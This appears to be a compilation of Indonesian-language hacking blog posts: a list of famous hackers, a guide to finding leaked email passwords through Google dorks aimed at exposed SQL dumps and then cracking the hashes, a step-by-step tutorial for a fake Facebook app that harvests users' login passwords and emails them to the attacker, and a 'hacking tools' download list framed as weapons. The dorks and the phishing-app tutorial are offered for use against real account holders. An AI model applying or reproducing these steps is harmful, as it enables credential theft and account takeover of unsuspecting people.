Seorang anak dari ilmuwan National Computer Security Center yang merupakan bagian dari National Security Agencies (NSA). Pertama kali menulis Internet Worm yang begitu momental pada tahun 1988. Menginfeksi ribuan komputer yang terhubung dalam jaringan.

Richard Stallman
Salah seorang "Old School Hacker", bekerja pada lab Artificial Intelligence MIT. Merasa terganggu dengan software komersial dan hak cipta pribadi. Akhirnya mendirikan GNU yang merupakan singkatan dari GNU NOT UNIX. Menggunakan komputer pertama sekali pada tahun 1969 di IBM New York Scientific Center saat berumur 16 tahun.

Kevin Poulsen
Melakukan penipuan digital terhadap stasiun radio KIIS FM, memastikan bahwa ia adalah penelepon ke 102 dan memenangkan Porsche 944 S2.

Ian Murphy
Bersama 3 rekannya, melakukan hacking ke dalam komputer AT&T dan mengubah setting jam internalnya. Hal ini mengakibatkan masyarakat pengguna telepon mendapatkan diskon "tengah malam" pada saat sore hari, dan yang telah menunggu hingga tengah malam harus membayar dengan tagihan yang tinggi.

Vladimir Levin
Lulusan St. Petersburg Tekhnologichesky University. Menipu komputer Citibank dan meraup keuntungan 10 juta dollar. Ditangkap interpol di Heathrow Airport pada tahun 1995.

Steve Wozniak
Membangun komputer Apple dan menggunakan "blue box" untuk kepentingan sendiri.

Tsutomu Shimomura
Berhasil menangkap jejak Kevin Mitnick

Dennis Ritchie dan Ken Thomson
Dennis Ritchie adalah seorang penulis bahas C, bersama Ken Thomson menulis sistem operasi UNIX yang elegan.

Eric Steven Raymond
Bapak hacker. Seorang hacktivis dan pelopor open source movement. Menulis banyak panduan hacking, salah satunya adalah "How To Become A Hacker" dan "The New Hacker's Dictionary". Begitu fenomental dan dikenal oleh seluruh masyarakat hackinf dunia. Menurut Eric, "dunia mempunyai banyak persoalan menarik dan menanti untuk dipecahkan".

Johan Helsingius
Mengoperasikan anonymous remailer paling populer di dunia.


semoga bermanfaat. :-)

Hack Email Accounts Using Google

Ngga Sengaja pas buka2 artikel lama nemu beberapa bahasan yg asyik n msh bisa digunakan, yap..artikel kali ini berhubungan dengan hack email, walaupun udah kesimpen setahun yang lalu ternyata masih ampuh loh..
Today im gonna show you how to hack email accounts using some special google dorks,remember google is our friend :)

Google Dorks:


Code:

ext:sql intext:@hotmail.com intext:e10adc3949ba59abbe56e057f20f883e


Code:

ext:sql intext:"INSERT INTO" intext:@hotmail.com intext:password


Code:

ext:sql intext:@hotmail.com intext:password

Ok..let begin
pi3

Pilih salah satu yang mengandung n berbau email
pic1
Pilih salah satu dan lsg taruh di hash cracker utk mendapatkan password email.
terlihat pass email adalah: Fireworks
pic2

Use this my favorite hash cracking
1. Hash Online #1

2. Hash Online #2


DONE :)

Remember, hacking email will not make you become a hacker
Just be what you are, Not what they are

Hacking Akun Facebook Via Facebook

Facebook, sapa sih yang gak kenal Facebook??? Salah satu situs jejaring sosial terbesar selain Friendster dan Twitter. Facebook dikenal karena kemudahan dan tentunya keamanannya.

Aman?? 100%?? hem..tidak ada yang sempurna.. banyak para hacker yang berusaha menembus pertahanan Facebook, seperti yang dilakukan team inj3ct0r yang menggunakan tehnik SQL pada salah satu Apps yang ada di Faceboook. Tehnik lain?? hem..saat ini lebih banyak menggunakan Social Enginering seperti tehnik Pishing,Poisoning Attack pada satu jaringan,Fake Login dll.

Disini saya akan membahas salah satu tehnik Social Enginering yaaa semacam fake login tapi menggunakan fasilitas Facebook itu sendiri.Maksudnya??maksudnya adalah kita membuat halaman palsu berupa apps di dalam Facebook tersebut.
Tata cara nya sebagai berikut:

1. Download scriptnya dulu http://www.mediafire.com/?448qgmyux5o2mb8 atau http://idws.us/jjfjdc
2. Cari server gratisan atau injekkan yang support .PHP ( tanya om Google ) atau .ASP ( http://www.jabry.net )
3. Facebook tentunya
Mulai pembuatannya deh :
Sudah disiapkan scriptnya?? kalau sudah, ubahlah di bagian yang saya tandai menjadi alamat e-mail anda

.PHP  Code:
mail(
"youremailaddress@domain.com",

.ASP Code:
Mailer.RemoteHost = "smtp.yourhost.com"
Mailer.AddRecipient "your name", "youremailaddress@host.com"
lalu upload ke server anda..dan tugas pertama kita selesai. :)

[Image: 
sshot6j.jpg]
Lalu masuk ke http://www.facebook.com/pages/create dan pilih "Perjuangan atau Komunitas" lalu masukkan nama halaman anda.
Disini dituntut kepandaian kita mengolah kata agar berkesan menarik. Contoh "Cek Kepopuleran FB Anda" dan selesaikan langkah yang di anjurkan.
Kalau udah punya Logo buat halaman kita lebih bagus lagi sekalian kita upload disana. Kalau udah di kolom "Alamat Web" kita isi http://www.facebook.com/ lalu selesai deh.
Saatnya kita masuk ke http://www.facebook.com/add.php?api_key=...1e44&pages dan kita pilih "aplikasi" lalu kita pilih "Go To Apps" dan masukkan kode FBML yang sudah didownload tadi.
Jangan lupa di bagian yang bertuliskan "http://yourwebsite.com/facebook.php" diganti Url tempat kita mengupload file Facebook.php tadi...dan klik "Save". selesai sudah tugas ke 2 kita. Lihat gambar dibawah ini

[Image: 
sshot7y.jpg]
Terakhir, kita share halaman yang udah kita buat tadi, lalu minta teman - teman kita buat meng-klik tombol "Like" usahakan minimal 25 orang yang nge-like. Jadi kita bisa membuat "username" untuk halaman kita, misal jadi "http://www.facebook.com/pagechecker" dan berharap orang-orang mencoba aplikasi kita, lalu boom..panen password deh....cek folder spam di server e-mail kita.

Kalau mau liat hasilnya ni ada halaman demonya,tapi jangan coba-coba masukkin password asli ya..he he he
DEMO
http://www.facebook.com/pages/Cek-Harga-...4949752878
tampilan kalau ada yang coba nih halaman kaya gini..

[Image: 
sshot3e.jpg]
[Image: 
sshot4g.jpg]
Dan hasilnya akan terekam dengan baik di e-mail yang udah kita setting tadi...he he he

[Image: 
sshot5e.jpg]

Tools Hacking terbaik

Written By Dejan on Monday, October 24, 2011 | 11:26 PM

Tools hackingTools hacking seperti sebuah senjata bagi seorang hacker. Tools hacking akan berfungsi sebagai alat untuk membunuh lawan dengan cara lebih mudah. Pada artikel sebelumnya, saya telah memberikan koleksi Ebook hacking terbaik. Jika ebook adalah pedomanya, maka tools hacking adalah senjatanya. Keduanya sangat berguna untuk proses perburuan mangsa.




Berikut isi koleksi top 10 vital hacking software and tools:
- Cain and Abel (sniffer)
- John the Ripper (brootforce)
- NetStumbler (Wifi breaker)
- Nmap (Network scanner)
- Putty (Telnet)
- SuperScan (Scanner & pinger)
- Hping (Pinger)
- Lcp (brute force password)
- Nikto (scanner broken web server)
- Kismet (sniffer wireless network 802.11)

DOWNLOAD
Top 10 Vital Hacking Software and Tools